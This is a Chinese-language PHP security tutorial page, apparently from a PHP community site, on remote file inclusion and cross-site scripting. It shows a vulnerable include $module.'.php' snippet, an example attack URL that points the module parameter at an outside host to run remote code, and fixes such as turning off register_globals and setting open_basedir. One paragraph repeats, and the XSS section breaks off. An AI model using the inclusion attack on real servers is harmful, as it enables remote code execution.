当前位置:  首页  >  凯发国际娱乐下载  >  PHP 安全  >  防注入

常见的PHP安全漏洞-跨站、注入和文件包含

这个脚本让攻击者有机会在你的服务器上执行任何的php代码,比如他在浏览器url后面加上?module=http://example.com/my就行了。当php接收到这个url的时候,脚本中的”$module”变量的值将被设置
1.include的时候要小心,要判断你本地是否有这个文件,以免造成安全漏洞。
比如:
include $module.’.php’;
?>
这里假设$module是全局变量。
这个脚本让攻击者有机会在你的服务器上执行任何的php代码,比如他在浏览器url后面加上?module=http://example.com/my就行了。当php接收到这个url的时候,脚本中的”$module”变量的值将被设置为http://example.com/my。因此当php执行include的时候就很危险了……
解决办法:关闭php.ini中的register_globals或include的时候判断一下。
if(file_exists($module.’.php’)){
include $module.’.php’;
}
?>
php.ini里面有个设置。设定open_basedir后只有指定的目录和子目录下的php脚本才会被执行。
用php读取open_basedir以外的目录或文件会报错
权限不足一般虚拟主机供应商都是设定为/tmp和/home
2.跨站运行脚本。
简单的说是攻击者可以在用户的浏览器端执行一些客户端的脚本,例如js,然后盗取用户的cookies或其他重要数据。
比如
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | 凯发国际娱乐 | 凯发国际娱乐下载 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有